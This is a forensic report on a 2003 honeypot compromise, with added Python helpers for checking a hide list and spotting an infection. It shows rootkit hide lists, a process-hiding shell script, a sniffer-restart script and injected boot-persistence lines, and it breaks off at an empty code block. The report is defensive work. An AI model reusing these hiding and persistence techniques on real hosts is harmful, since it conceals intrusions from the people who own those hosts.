Created: 29/09/2003 00:26

Forensic Analysis

Files obtained from system sbm79.dtc.apu.edu at Sun Aug 10 20:31:41 PDT 2003


/dev/shm/k

ELF executable. It is an exploit for the Linux kernel ptrace vulnerability, used to escalate privileges from an ordinary account to uid 0 (root).


/dev/ttyop

d14dd73ee79bd009fc5473852ea55fac ---> 74 bytes <---

Configuration file for the trojaned 'ps' command (see /bin/ps below): the list of process names / strings to hide from its output. It contains:

psbnc
smbd
iceconf.h
icekey.h
icepid.h
uptime
startwu
r00t

Extracted from rk.tar.gz. Note that the eight strings above add up to 59 bytes including newlines, the size recorded for /dev/ttyof below, while this file is 74 bytes, so the listing here is probably incomplete.


/dev/ttyoa

9822e71858735f58e142293ad1695166 ---> 134 bytes <---

Configuration file for the trojaned 'netstat' command (see /bin/netstat below): the list of addresses and ports whose connections are hidden from its output. Each line is a type number followed by a pattern; the type-1 entries are address prefixes, the type-3 and type-4 entries are port numbers. Its contents:

1 213.233
1 24.104
1 217.10
1 216
1 193
1 209.118
3 10001
3 10002
3 13064
3 19
3 69
3 6667
4 10001
4 6667
4 10002
4 19
4 69
4 13064

The file was extracted from sk.tar.gz. In particular, the following connections were hidden (found with a trusted netstat binary):

tcp  0 0 192.168.1.79:1149    64.62.96.42:6667       ESTABLISHED 15119/initd
tcp  0 0 192.168.1.79:1146    199.184.165.133:6667   ESTABLISHED 15119/initd
udp  0 0 192.168.1.79:1029    192.168.1.1:53         ESTABLISHED 15458/sendmail

The two IRC sessions to port 6667 are covered by the '6667' entries. The DNS exchange with 192.168.1.1:53 matches none of the listed prefixes or ports, so its absence from the trojaned output is not explained by this file alone. initd is part of the psyBNC package (see below).
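
As an added check, not part of the original report, the following Python script replays the /dev/ttyoa list above against the trusted netstat output, to see which lines a trojaned netstat would drop. The matching rules are an assumption drawn from the data (type 1: substring of either address, type 3: local port, type 4: remote port), since the rootkit's source is not reproduced here; both inputs are copied from the report.

```python
"""Replay a netstat hide list such as /dev/ttyoa against real netstat output to
see which lines a trojaned netstat would drop.  Added example, not part of the
report or of the rootkit.  The matching rules are an assumption drawn from the
data (type 1: substring of either address, type 3: local port, type 4: remote
port; other types ignored); the two inputs are copied from the report above."""
import re

# Constructed: the /dev/ttyoa contents quoted in the report.
TTYOA = """\
1 213.233
1 24.104
1 217.10
1 216
1 193
1 209.118
3 10001
3 10002
3 13064
3 19
3 69
3 6667
4 10001
4 6667
4 10002
4 19
4 69
4 13064
"""

# Constructed: the three lines obtained with a trusted netstat.
TRUSTED_NETSTAT = """\
tcp  0 0 192.168.1.79:1149    64.62.96.42:6667       ESTABLISHED 15119/initd
tcp  0 0 192.168.1.79:1146    199.184.165.133:6667   ESTABLISHED 15119/initd
udp  0 0 192.168.1.79:1029    192.168.1.1:53         ESTABLISHED 15458/sendmail
"""

def parse_hide_list(text):
    """Return {type: [pattern, ...]} from 'type pattern' lines; other lines ignored."""
    rules = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 2 and parts[0].isdigit():
            rules.setdefault(int(parts[0]), []).append(parts[1])
    return rules

# proto recv-q send-q local:port remote:port ...
SOCKET_RE = re.compile(r"^(tcp|udp)\s+\d+\s+\d+\s+(\S+):(\d+)\s+(\S+):(\d+)")

def is_hidden(line, rules):
    """True when the line matches any rule under the assumed semantics."""
    m = SOCKET_RE.match(line)
    if not m:
        return False                      # headers, unix sockets: never hidden
    _proto, laddr, lport, raddr, rport = m.groups()
    if any(p in laddr or p in raddr for p in rules.get(1, [])):
        return True
    if lport in rules.get(3, []):
        return True
    return rport in rules.get(4, [])

def split_netstat(output, rules):
    """Return (shown, hidden): the lines a trojaned netstat keeps and drops."""
    shown, hidden = [], []
    for line in output.splitlines():
        (hidden if is_hidden(line, rules) else shown).append(line)
    return shown, hidden

if __name__ == "__main__":
    shown, hidden = split_netstat(TRUSTED_NETSTAT, parse_hide_list(TTYOA))
    print("dropped by the trojaned netstat:")
    for line in hidden:
        print("  " + line)
    print("still visible:")
    for line in shown:
        print("  " + line)
```

Under these rules the two IRC sessions are dropped by the 6667 entries and the sendmail DNS exchange stays visible, which is the point of comparing a trusted netstat with the trojaned one: anything the trusted tool shows and the system's own does not is a hidden connection.
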


/dev/ttyof

95400773ef48d3898960c918553a74e4 ---> 59 bytes <---

Configuration file for the trojaned 'ls' command (see /bin/ls below): the list of file names to hide from its output. It contains:

psbnc
smbd
iceconf.h
icekey.h
icepid.h
uptime
startwu
r00t

Extracted from rk.tar.gz


/dev/hdx1

d41d8cd98f00b204e9800998ecf8427e ---> 0 bytes <---

Empty file (the MD5 above is that of zero bytes). Together with /dev/hdx2 it is the lock/marker file created by the RST.b ELF virus, which shows that RST.b is active on this host: several of the binaries recovered, such as 'sp0' and 'k', are infected with it. The string 'GET /~telcom69/gov.php' inside these files confirms the infection.

RST.b infects ELF executables and installs a backdoor that reads raw packets from ppp0 and eth0 with the interfaces in promiscuous mode.

See http://www.securityfocus.com/archive/100/247640 for details
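
An added example, not from the report: a small Python scanner that flags ELF files carrying the RST.b marker string quoted above and checks for the /dev/hdx1 and /dev/hdx2 lock files. The directory it scans is constructed in the code (a clean ELF, a marked ELF, a text file containing the marker, and a fake /dev with only hdx1); no real RST.b sample is involved.

```python
"""Flag ELF files carrying the RST.b marker string and check for its /dev/hdx1
and /dev/hdx2 lock files.  Added example, not part of the report; the files it
scans are constructed below as fixtures (a clean ELF, a marked ELF, a text file
containing the marker, and a fake /dev with only hdx1), not a real sample."""
import os
import tempfile

ELF_MAGIC = b"\x7fELF"
RST_B_MARKER = b"GET /~telcom69/gov.php"      # string quoted in the report
RST_B_LOCKS = ("hdx1", "hdx2")                # empty files RST.b leaves in /dev

def classify_file(path):
    """'infected' = ELF with the marker, 'elf' = ELF without it, 'other' = not ELF."""
    with open(path, "rb") as f:
        data = f.read()
    if not data.startswith(ELF_MAGIC):
        return "other"
    return "infected" if RST_B_MARKER in data else "elf"

def scan_tree(root):
    """Return the sorted paths of marked ELF files under root (symlinks skipped)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            try:
                if classify_file(path) == "infected":
                    hits.append(path)
            except OSError:
                continue                      # unreadable; report separately
    return sorted(hits)

def lock_files_present(dev_dir="/dev"):
    """Names of the RST.b lock files that exist in dev_dir."""
    return [n for n in RST_B_LOCKS if os.path.exists(os.path.join(dev_dir, n))]

def build_sample_tree():
    """Constructed fixture tree; returns its root directory."""
    root = tempfile.mkdtemp(prefix="rstb_")
    os.makedirs(os.path.join(root, "usr", "lib"))
    os.makedirs(os.path.join(root, "dev"))
    fake_elf = ELF_MAGIC + b"\x01\x01\x01" + b"\0" * 64   # header bytes only
    with open(os.path.join(root, "usr", "lib", "clean"), "wb") as f:
        f.write(fake_elf)
    with open(os.path.join(root, "usr", "lib", "sp0"), "wb") as f:
        f.write(fake_elf + RST_B_MARKER + b"\0")
    with open(os.path.join(root, "usr", "lib", "notes.txt"), "wb") as f:
        f.write(RST_B_MARKER)                 # marker in a non-ELF file: not a hit
    open(os.path.join(root, "dev", "hdx1"), "wb").close()
    return root

def demo():
    """Scan the fixture tree and return the findings (paths relative to root)."""
    root = build_sample_tree()
    return {
        "infected": [os.path.relpath(p, root).replace(os.sep, "/") for p in scan_tree(root)],
        "clean": classify_file(os.path.join(root, "usr", "lib", "clean")),
        "text": classify_file(os.path.join(root, "usr", "lib", "notes.txt")),
        "locks": lock_files_present(os.path.join(root, "dev")),
    }

if __name__ == "__main__":
    print(demo())
```

Run against a mounted image of the compromised disk (scan_tree on the mount point, lock_files_present on its dev directory) rather than on the live system, whose ls and ps are trojaned; on the honeypot both lock files would be reported and sp0 and k would be among the hits.
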


/dev/hdx2

d41d8cd98f00b204e9800998ecf8427e ---> 0 bytes <---

See /dev/hdx1 description


/var/lib/slocate/slocate.db

3463b9f061397de435c3fa4f7201e9dc ---> 219308 bytes <---

slocate database file, automatically rebuilt by the daily slocate cron job.


/var/lib/random-seed

3ab2b49b2d1f188a6f898435d550f2a4 ---> 512 bytes <---

Kernel entropy pool seed, written by the init scripts (rc.sysinit/halt) to carry randomness across reboots. It is not related to sshd; the SSH daemons planted on this host keep their own seed files (see /usr/lib/sp0_seed and /usr/include/iceseed.h below). Nothing interesting here.


/var/lib/logrotate.status

385d12f5f0295bc888e832fecf21f838 ---> 554 bytes <---

Standard logrotate state file. Nothing interesting here.


/var/log/wtmp

d41d8cd98f00b204e9800998ecf8427e ---> 0 bytes <---

Login record file, empty (the MD5 above is that of zero bytes). On a host that has been up since Aug 9 with a console root login recorded in utmp (see /var/run/utmp below) this means the file was emptied after boot, consistent with a log cleaner such as /lib/.x/cl (see below).


/var/log/secure

9db9bac6f1a7083b89a49880138453da ---> 179 bytes <---

Log file that shows:

·  a telnet connection from 193.109.122.5, at Aug 10 16:04. The same event is logged by both sniffers as proxyscan.undernet.org => 192.168.1.79 [23] at 16:04:13 (see /usr/lib/libice.log and /lib/.x/s/mfs below): Undernet's open-proxy scanner probing the host after the psyBNC bouncer connected to its IRC servers.

·  an ssh connection from 202.85.165.46, at Aug 10 18:58.


/var/log/maillog

c59428104fb9d66018093d4b91706fe5 ---> 16358 bytes <---

Log file that shows:

·  lots of error messages mailed to root.

·  a mail sent to jijeljijel@yahoo.com at Aug 10 14:14:01

·  a mail sent to newptraceuser@yahoo.com at Aug 10 15:37:40

·  a mail sent to newptraceuser@yahoo.com at Aug 10 15:42:31

·  a mail sent to skiZophrenia_siCk@yahoo.com at Aug 10 15:43:43

·  a mail sent to newptraceuser@yahoo.com at Aug 10 16:34:50

At least the 15:43:43 message matches the address hard-coded in /lib/.x/.boot (see below), which mails the rootkit's details to its owner.


/var/log/cron

10ca2eef8abbc3b987773d0594f6cd18 ---> 3665 bytes <---

Shows that /usr/lib/sa/sa1 is executed every 10 minutes (but fails, see /var/spool/mail/root).


/var/log/boot.log

76eb13e6be26ca1e55c03c1aae2b7028 ---> 676 bytes <---

Log file. It records:

·  syslog stop & start at Aug 10 13:33:57

·  sshd failed to start at Aug 10 14:13:47

·  httpd restarted at Aug 10 15:52:10; its log file had been deleted beforehand


/var/cache/man/whatis

71aa662387df40232004266b564e6eb4 ---> 80834 bytes <---

Whatis cache file, rebuilt by the makewhatis cron job.


/var/cache/samba/smbd.pid

0ffe5895797d438f4dcda5e8d61c53a4 ---> 20 bytes <---

Standard pid file for the Samba server daemon (the real smbd, not the rootkit's '/usr/bin/smbd -D' binary described below).


/var/cache/samba/connections.tdb

9359defefbf14f5abe7979302dcf3330 ---> 8192 bytes <---

Standard connections database for the Samba server daemon.


/var/cache/samba/nmbd.pid

dd79b9b3fbd87b8cf5902769774dfd1e ---> 20 bytes <---

Standard pid file for the NetBIOS name server daemon.


/var/lock/subsys/netfs

d41d8cd98f00b204e9800998ecf8427e ---> 0 bytes <---

Empty lock file. Its timestamp shows that the system was started at Aug 9 14:34. No interest here.


/var/lock/subsys/identd

d41d8cd98f00b204e9800998ecf8427e ---> 0 bytes <---

Empty lock file. Its timestamp shows that the system was started at Aug 9 14:34. No interest here.


/var/lock/subsys/xinetd

d41d8cd98f00b204e9800998ecf8427e ---> 0 bytes <---

Empty lock file. Its timestamp shows that the system was started at Aug 9 14:34. No interest here.


/var/lock/subsys/smb

d41d8cd98f00b204e9800998ecf8427e ---> 0 bytes <---

Empty lock file. Its timestamp shows that the system was started at Aug 9 14:34. No interest here.


/var/lock/subsys/atd

d41d8cd98f00b204e9800998ecf8427e ---> 0 bytes <---

Empty lock file. Its timestamp shows that the system was started at Aug 9 14:34. No interest here.


/var/run/utmp

31aec4f90967e75fe302bc284dd2bcf2 ---> 4224 bytes <---

utmp run file. Shows the system boot at Aug 9 14:34 & a console root login one minute later. Nothing new.


/var/run/runlevel.dir

4d637364dbabc3b52dcc9b62de6c743e ---> 11 bytes <---

Shows that we are in runlevel 3.


/var/run/syslogd.pid

f3244ea97307a780a6ab2a4a7a09d1e7 ---> 5 bytes <---

syslogd is PID 3247. The interesting point is that this proves syslog was restarted at Aug 10 13:33: the daemons started at boot all have PIDs in the 600-900 range (see below), so a PID in the 3000s cannot date from boot.


/var/run/klogd.pid

3bf921f003734f68d89171a6b5fbd406 ---> 5 bytes <---

klogd is PID 3252. Again, this proves that the logging daemons were restarted at Aug 10 13:33, the same minute the rootkit binaries were installed (see /usr/bin/top below).


/var/run/apmd.pid

10acb03f24b5df50f22482fc620cc76c ---> 4 bytes <---

apmd is PID 657. It was started at system boot at Aug 9 14:34. No hacking info here.


/var/run/identd.pid

d0fe75fd3cb3d50a2a4744dbd3ed8c7d ---> 4 bytes <---

identd is PID 677. It was started at system boot at Aug 9 14:34. No hacking info here.


/var/run/sshd.pid

aba3121d9a4398d318b708926dbf880d ---> 4 bytes <---

sshd is PID 699. It was started at system boot at Aug 9 14:34, but the file was accessed at Aug 10 14:13, the same minute /var/log/boot.log records an sshd start attempt failing. Probably the hacker or an automated script read the pid while restarting the daemon.


/var/run/xinetd.pid

a2ef60a97da72fbbcd66da60bc0faaf8 ---> 4 bytes <---

xinetd is PID 732. It was started at system boot at Aug 9 14:34. No hacking info here.


/var/run/sendmail.pid

d7dc9e01362a0627d64bd922455603ba ---> 32 bytes <---

sendmail is PID 759. It was started at system boot at Aug 9 14:34. No hacking info here.


/var/run/gpm.pid

99f37a9889067f04d2d9fbc67ca448f0 ---> 4 bytes <---

gpm is PID 778. It was started at system boot at Aug 9 14:34. No hacking info here.


/var/run/crond.pid

95f378603a9d5b8c158a2e627ae09abd ---> 4 bytes <---

crond is PID 820. It was started at system boot at Aug 9 14:34. No hacking info here.


/var/run/atd.pid

8190fe72621c532e70e93e038ab717ca ---> 4 bytes <---

atd is PID 886. It was started at system boot at Aug 9 14:34, but the process is no longer running.


/var/run/httpd.mm.14637.sem

d41d8cd98f00b204e9800998ecf8427e ---> 0 bytes <---

mod_ssl shared-memory semaphore file; the number is the PID of the httpd parent that created it. Shows httpd was restarted at Aug 10 15:52, after executing /root/sslstop/sslport.


/var/run/httpd.mm.14671.sem

d41d8cd98f00b204e9800998ecf8427e ---> 0 bytes <---

Same kind of file. Shows httpd was restarted again at Aug 10 15:54.


/var/spool/mail/root

a2cd5914ecbbec368df64bd0cba042ec ---> 15262 bytes <---

There are a lot of mails from the cron daemon. Every ten minutes it tries to run /usr/lib/sa/sa1, which fails because /var/log/sa/sa10 cannot be opened. Note that the hacker deleted this mailbox ('rm -rf /var/mail/root' in /.bash_history below), so everything in it postdates that command.


/var/spool/anacron/cron.daily

bf129e89502a383fbc508d01c0ed7f73 ---> 9 bytes <---

Contains the date of the last daily run: 10 Aug 2003.


/var/spool/anacron/cron.weekly

bf129e89502a383fbc508d01c0ed7f73 ---> 9 bytes <---

Contains the date of the last weekly run: 10 Aug 2003.


/etc/mtab

74cc4500b7cf083a5cc7deb090d7eadf ---> 193 bytes <---

This file was modified by my initial 'mount /dev/cdrom /mnt/cdrom' command, needed to access trusted static binaries.


/etc/opt/psyBNC2.3.1.tar.gz

d583ed4e3a98f71ac5ae8b5e4caf3424 ---> 312188 bytes <---

This file contains the psyBNC 2.3.1 package. psyBNC is an IRC bouncer: a proxy that keeps a persistent IRC session open from the compromised host, so the hacker's real address stays hidden behind it. psyBNC was downloaded & installed by our hacker at Aug 10 15:57. See http://www.netknowledgebase.com/tutorials/psybnc.html for details about psyBNC


/etc/opt/psybnc/ & files inside

---> 4096 bytes <---

Files extracted from the package above. The configuration file 'psybnc.conf' shows several entries, among them:

PSYBNC.SYSTEM.PORT1=65336
PSYBNC.SYSTEM.PORT2=-100
USER1.USER.LOGIN=sic
USER1.USER.NICK=[[[kgb]]]
USER1.SERVERS.SERVER1=mesa.az.us.undernet.org
USER1.SERVERS.PORT1=6667
USER1.CHANNELS.ENTRY1=#radioactiv
USER1.CHANNELS.ENTRY0=#RedCode
USER2.USER.LOGIN=redcode
USER2.USER.NICK=redcode
USER2.SERVERS.SERVER1=mesa.az.us.undernet.org
USER2.SERVERS.PORT1=6667
USER2.CHANNELS.ENTRY1=#AiaBuni
USER2.CHANNELS.ENTRY0=#RedCode

So, psyBNC was configured to connect to the server mesa.az.us.undernet.org: as user 'sic', with nick '[[[kgb]]]', into the channels #radioactiv & #RedCode; and as user 'redcode', with nick 'redcode', into the channels #AiaBuni & #RedCode.

The bouncer listens on local port 65336 (PORT1) plus a second listener, recorded as PORT2=-100 in the file, and connects out to the standard IRC port 6667. Those outgoing 6667 sessions are the ones hidden from the trojaned netstat (see /dev/ttyoa above).


/etc/rc.d/init.d/functions

d19a34be51db694afbe844f01ff6f230 ---> 9315 bytes <---

It is the original functions file, but the following line was added at the end:

/usr/bin/crontabs -t1 -X53 -p

Since every init script sources this file, the trojaned 'crontabs' binary is started each time a service is started or stopped, and in particular at system startup. It was modified by the script 'install' inside rk.tar.gz.


/etc/rc.d/rc.sysinit

bde52d602f2a66a51a3d0fd958397640 ---> 20991 bytes <---

This system file has been modified to load kernel modules regardless of configuration and to run 'kflushd' at the end of the boot sequence (kflushd is the name of a legitimate kernel thread on 2.2 kernels, so the entry blends in). Running 'diff' between a standard RedHat 7.2 rc.sysinit ('<') and the honeypot's copy ('>') gives:

56c56
< if grep -q /initrd /proc/mounts && ! grep -q /initrd/loopfs /proc/mounts ; then
---
> if grep -q /initrd /proc/mounts ; then
439c439
<       action $"Loading sound module ($alias): " modprobe sound
---
>       action $"Loading sound module ($alias): " modprobe $alias
444c444
<       action $"Loading sound module ($alias): " modprobe sound-slot-0
---
>       action $"Loading sound module ($alias): " modprobe $alias
744,745c735,736
<  [ -r /proc/modules ] && /bin/cat /proc/modules;
<  [ -r /proc/ksyms ] && /bin/cat /proc/ksyms) >/var/log/ksyms.0
---
>  /bin/cat /proc/modules;
>  /bin/cat /proc/ksyms) >/var/log/ksyms.0
754a746
> kflushd

The last hunk, the bare 'kflushd' line, is the clear addition: it runs whatever binary of that name is first in the PATH, as root, at every boot.


/etc/mail/statistics

ae6826b360dc7e169fb7409de4eca36e ---> 628 bytes <---

Standard mail statistics file.


/etc/aliases.db

597e7395603526c9cb37cdfdaaf8175f ---> 12288 bytes <---

Standard mail aliases database.


/etc/adjtime

31089f51635afd4f8df196c729bdfb14 ---> 48 bytes <---

Standard adjtime file.


/etc/samba/secrets.tdb

e3eccac859eb4441dce3a4b3640b5bb4 ---> 8192 bytes <---

Standard Samba secrets database.


/etc/httpd/conf/httpd.conf

abb3e3acb5459112415c7bee7a3bf4f4 ---> 50851 bytes <---

httpd configuration file. It has been modified by the 'sslstop' & 'sslport' programs (see /root/sslstop below): the SSL section is disabled by renaming its 'HAVE_SSL' IfDefine tag to 'HAVE_SSS' (which nothing defines), and the standard SSL port 443 is replaced with 114. The net effect is that mod_ssl no longer serves on the host.

That happened at Aug 10 15:52, and httpd was restarted.


/etc/psdevtab

928531d369ec509db354994d91a08c51 ---> 12288 bytes <---

This is the tty device-name cache that the procps 'ps' and 'top' write when run as root, to speed up mapping device numbers to /dev/tty* names; that is why it is full of tty devices. The trojaned 'ps' and 'top' are evidently built from the procps sources and use it like the originals, so on its own it is not a rootkit indicator. The hide list for 'ps' is /dev/ttyop (see above).


/usr/bin/top

58a7e5abe4b01923c619aca3431e13a8 ---> 48856 bytes <---

Trojaned 'top' command. Like the trojaned 'ps', it uses /etc/psdevtab (the procps tty cache, see above).

Contained in rk.tar.gz, it was installed at Aug 10 13:33.

The original top binary (34924 bytes) was moved to /usr/lib/libshtift/top.


/usr/bin/sense

464dc23cac477c43418eb8d3ef087065 ---> 4060 bytes <---

Perl script. The file itself explains its purpose: it sorts the output from LinSniffer. It was installed at Aug 10 13:33.

Extracted from package rk.tar.gz


/usr/bin/sl2

4cfae8c44a6d1ede669d41fc320c7325 ---> 8268 bytes <---

Contained in rk.tar.gz package.

ELF executable. It seems to be a SYN flood (denial of service) tool.


/usr/bin/logclear

49d1b847a9639501a001036454118a59 ---> 98 bytes <---

Shell script; it has just four -interesting- lines:

killall -9 /usr/bin/"(swapd)"
rm -rf /usr/bin/tcp.log
touch /usr/bin/tcp.log
"(swapd)" >tcp.log &

So it kills any running '(swapd)' sniffer (see below), wipes /usr/bin/tcp.log and restarts the sniffer with its standard output redirected to tcp.log. Note that the last line uses relative names: '(swapd)' is found through the PATH, but tcp.log is created in the current directory, so it is /usr/bin/tcp.log only when the script is run from /usr/bin. Despite its name, the script clears the sniffer's capture, not the system logs.


/usr/bin/crontabs

f4198b40e62130ad6e173443037ded1b ---> 13707 bytes <---

Rootkit file, posing as a system file named 'crontabs'. Contained in rk.tar.gz, it just executes system("smbd -D"), where 'smbd -D' (with the embedded space) is a file name, not the standard Samba smbd daemon with the -D option.

It is started from /etc/rc.d/init.d/functions as 'crontabs -t1 -X53 -p' (see above); the arguments are decoration and are ignored. So it is basically a method of starting the binary 'smbd -D' without being too noisy.


/usr/bin/smbd -D

0c9fd2ff1740a4ae5b4a1a3a82846f44 ---> 672527 bytes <---

Another sshd binary, named so that it looks like the Samba daemon in a process listing. It is currently running, as shown by the ps & fuser commands.

It uses the configuration file /usr/include/iceconf.h (listening on port 2003, see below).

Extracted from rk.tar.gz package, its original name was ava1.


/usr/bin/(swapd)

bc6d6b0ffb4e41e4753289fe28cf3521 ---> 18439 bytes <---

Contained in rk.tar.gz. It is a sniffer, named to look like the kernel's swap daemon, that tries to log users & passwords. The source for this binary is kde.c, inside rk.tar.gz.

It basically sniffs the network and logs the user names and passwords of standard cleartext services to the file /usr/lib/libice.log.

Its PID is saved in the file /usr/bin/x.pid.


/usr/bin/x.pid

6ec8391d492a8b08387b885868124e07 ---> 5 bytes <---

It contains the PID of the '(swapd)' sniffer (see above).


/usr/lib/libshtift/netstat

0ea03807e53e90b147c4309573ebc76a ---> 83132 bytes <---

This is the original /bin/netstat file, moved here by the hacker. That happened at Aug 10 13:33, as reported by its modification time.

The deleted & recovered installation script /tmp/sand/install was the author.


/usr/lib/libshtift/ps

881c7af31f6f447e29820fb73dc1dd9a ---> 63180 bytes <---

This is the original /bin/ps file, moved here by the hacker. That happened at Aug 10 13:33, as reported by its modification time.

The deleted & recovered installation script /tmp/sand/install was the author.


/usr/lib/libshtift/ls

3e743c6bfa1e34f2f2164c6a1f1096d0 ---> 45948 bytes <---

This is the original /bin/ls file, moved here by the hacker. That happened at Aug 10 13:33, as reported by its modification time.

The deleted & recovered installation script /tmp/sand/install was the author.


/usr/lib/libshtift/ifconfig

e984302652a0c59469a0d8826ae3cdeb ---> 51164 bytes <---

This is the original /sbin/ifconfig file, moved here by the hacker. That happened at Aug 10 13:33, as reported by its modification time.

The deleted & recovered installation script /tmp/sand/install was the author.


/usr/lib/libshtift/top

6091c2a0a9231844d1ee9d43f29e6767 ---> 34924 bytes <---

This is the original /usr/bin/top file, moved here by the hacker. That happened at Aug 10 13:33, as reported by its modification time.

The deleted & recovered installation script /tmp/sand/install was the author.


/usr/lib/libsss

3af0bf9dc137cb0122f491a03578fa8d ---> 2 bytes <---

Unknown purpose. Contained in rk.tar.gz.


/usr/lib/libice.log

ca9b5865f9abf2681626b0425c602854 ---> 47 bytes <---

Log file for the sniffer running as process 3153, /usr/bin/(swapd) (see above).

It just contains one unfinished telnet connection to the honeypot:

proxyscan.undernet.org => 192.168.1.79 [23]
?k

That happened at Aug 10 16:04: it is Undernet's open-proxy scanner probing the host after the psyBNC bouncer connected to the Undernet IRC servers. The same connection appears in /var/log/secure and in /lib/.x/s/mfs. Nothing else was captured.


/usr/lib/adore.o

5ea1d457d6abac0badf6aad483eedec4 ---> 5636 bytes <---

Adore LKM rootkit, a loadable kernel module that hides files, processes and connections. See http://stealth.7350.org/rootkits/ for details.

It was downloaded from http://izolam.net with wget and compiled, all through an automated script.


/usr/lib/cleaner.o

f7396eecac23103623b75b47488133b2 ---> 1016 bytes <---

Part of the Adore rootkit (see above): the helper module that unlinks adore from the kernel's module list so that it does not show up in lsmod. Downloaded, compiled and installed with the same script.


/usr/lib/sp0

18823bc17ecf747f5e7720bc206095e1 ---> 230163 bytes <---

Trojaned sshd binary, using the configuration file /usr/lib/sp0_cfg. As noted under /dev/hdx1, this binary is also infected with RST.b.


/usr/lib/sp0_cfg

7d35ce8c6f9a4a963499d2e69928d14e ---> 621 bytes <---

Configuration file for the ssh server daemon in /usr/lib/sp0. It makes the daemon listen on port 345, with the host private key in /usr/lib/sp0_key and the random seed in /usr/lib/sp0_seed.


/usr/lib/sp0_key

c64a48e10820d5de2c27f6ff1020d5f3 ---> 532 bytes <---

sshd host private key for /usr/lib/sp0. The string root@xxxbuck.com inside is the key's comment field, which ssh-keygen fills with user@host of the machine where the key was generated: this key was made on another machine and shipped with the kit.


/usr/lib/sp0_seed

e8f34849cbf8c80edf835b6a5cdc3d35 ---> 513 bytes <---

Random seed file for the sshd daemon /usr/lib/sp0.


/usr/include/icekey.h

5039776bb1a636b6a7ea2493d3a4d31c ---> 539 bytes <---

ssh host private key. The string root@lessons.menchey.com inside is the key comment, i.e. the user@host where ssh-keygen generated it, so this key too was created on another machine and comes with the kit.

Extracted from sk.tar.gz, its original name was 'h'.

Used by the "smbd -D" binary (see above).


/usr/include/iceconf.h

18d0615f33203484ec58eaf88a022ca5 ---> 692 bytes <---

sshd configuration file. It configures a server listening on port 2003, with the host key in /usr/include/icekey.h.

Extracted from sk.tar.gz package, its original name was hh. It was installed by the binary program ava1.

Used by the "smbd -D" binary (see above).


/usr/include/iceseed.h

4aac13dcc30140448f54eab730228c81 ---> 512 bytes <---

ssh random seed file.

Used by the "smbd -D" binary (see above).


/usr/include/icepid.h

31bd68ac7cfb460e7f5e68a8eb1c184e ---> 5 bytes <---

Contains the PID of the sshd process that uses the /usr/include/ice* configuration files. It turns out to be process 3137, "smbd -D".


/bin/netstat

c0e8b6ff00433730794eda274c56de3f ---> 30640 bytes <---

Trojaned netstat command. It uses the file /dev/ttyoa (see above) as its configuration, hiding connections to certain addresses & ports. Note the size: the original, in /usr/lib/libshtift/netstat, is 83132 bytes.

Contained in rk.tar.gz package


/bin/ps

a71c756f78583895afe7e03336686f8b ---> 32756 bytes <---

Trojaned 'ps' command. It uses the file /dev/ttyop (see above) as its configuration file (processes to hide from the output). The original, in /usr/lib/libshtift/ps, is 63180 bytes.

Extracted from rk.tar.gz package.


/bin/ls

9e7165f965254830d0525fda3168fd7d ---> 36692 bytes <---

Trojaned 'ls' command. It uses the file /dev/ttyof (see above) as its configuration file (files to hide from the output). The original, in /usr/lib/libshtift/ls, is 45948 bytes.

Extracted from rk.tar.gz package.


/bin/pico

8b0afccbb9fec255fe38bdb6d0776ba7 ---> 165136 bytes <---

Extracted from rk.tar.gz package, seems to be a standard 'pico' editor. The hacker doesn't seem to like vim :-).


/lib/.x/hide

15502d3606c6597a9dfd93c5783cd0a0 ---> 303 bytes <---

Simple shell script. It hides every process whose command line contains '/lib/.x', 'xopen' or 'lsn', by passing each PID to the SucKIT 'sk i' (hide PID) command. The result is written to hide.log:

#!/bin/sh
for i in $(ps aux|grep "/lib/.x"|awk -F " " '{print $2}')
do
/lib/.x/sk i $i >>/lib/.x/hide.log
done
for z in $(ps aux|grep xopen|awk -F " " '{print $2}')
do
/lib/.x/sk i $z >>/lib/.x/hide.log
done
for x in $(ps aux|grep lsn|awk -F " " '{print $2}')
do
/lib/.x/sk i $z >>/lib/.x/hide.log
done

Two things are worth noting: the third loop uses $z instead of $x, so the 'lsn' sniffer would never have been hidden even if SucKIT had worked; and each 'ps aux|grep' also matches the grep process itself. In any case the SucKIT kernel part never installed on this host (see hide.log below), so none of the hiding took effect.


/lib/.x/inst

cf1d1e50ed26092f8e45f567a8c1d0b8 ---> 59137 bytes <---

Installation binary for the SucKIT rootkit. It creates the 'rk' binary and moves the standard /sbin/init to /sbin/init13996, putting 'rk' in its place as the new /sbin/init so that the rootkit is re-installed at every boot.

But on the honeypot these actions fail, as /sbin/init has the immutable bit set (chattr +i).


/lib/.x/log

b25f11e3d1ef6174a70d64b9b9234871 ---> 25795 bytes <---

login executable from the SucKIT rootkit.


/lib/.x/cl

3ae85818c23ade056241888a65dc2d20 ---> 17931 bytes <---

Log file cleaner from the same rootkit.


/lib/.x/ip

68b329da9893e34099c7d8ad5cb9c940 ---> 1 bytes <---

One-byte file. Its MD5 is that of a single newline character, so it is effectively empty (probably written by an 'echo' with no argument). Purpose unknown.


/lib/.x/s/s_h_k.pub

59abb063354d8a91ea81a8bc53a0e243 ---> 340 bytes <---

Public half of the ssh host key /lib/.x/s/s_h_k (see below). The size is consistent with a one-line 1024-bit SSH1 public key, 'bits exponent modulus comment'.


/lib/.x/s/sshd_config

dd85d5ef3d7a2c75ce76cc8949aeebb5 ---> 669 bytes <---

Configuration file for the trojaned sshd server /lib/.x/s/xopen.


/lib/.x/s/xopen

fd444a070eaa57e06d6edb7a112f02cc ---> 217667 bytes <---

Trojaned sshd.

There are TWO instances running: processes 25239 & 25241.

One of them is a trojaned ssh server with a hacker's password. The other is a tty sniffer that sends what it captures over UDP. But as the SucKIT installation didn't work, the tty sniffing didn't either.


/lib/.x/s/s_h_k

95a2ef0596d7b9dbcf7f2105d9fd4986 ---> 536 bytes <---

ssh private host key for the server in /lib/.x/s/xopen.

Interesting string inside: "root@fred.psiware.net", the key comment, which names the account and host where the key was generated (again not this machine).
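
The three planted SSH servers above each carry a host key (sp0_key, icekey.h, s_h_k) whose comment names a foreign host. As an added example, not part of the report, the Python below parses the public fields of such a key file and of its .pub line so that keys can be compared across kits. It assumes the SSH1 'SSH PRIVATE KEY FILE FORMAT 1.1' layout (id string, cipher byte, 4 reserved bytes, u32 bit count, mpint modulus, mpint exponent, length-prefixed comment, then the private section), which the seed files and file sizes suggest; the key material used is constructed from fake numbers and is not a real key.

```python
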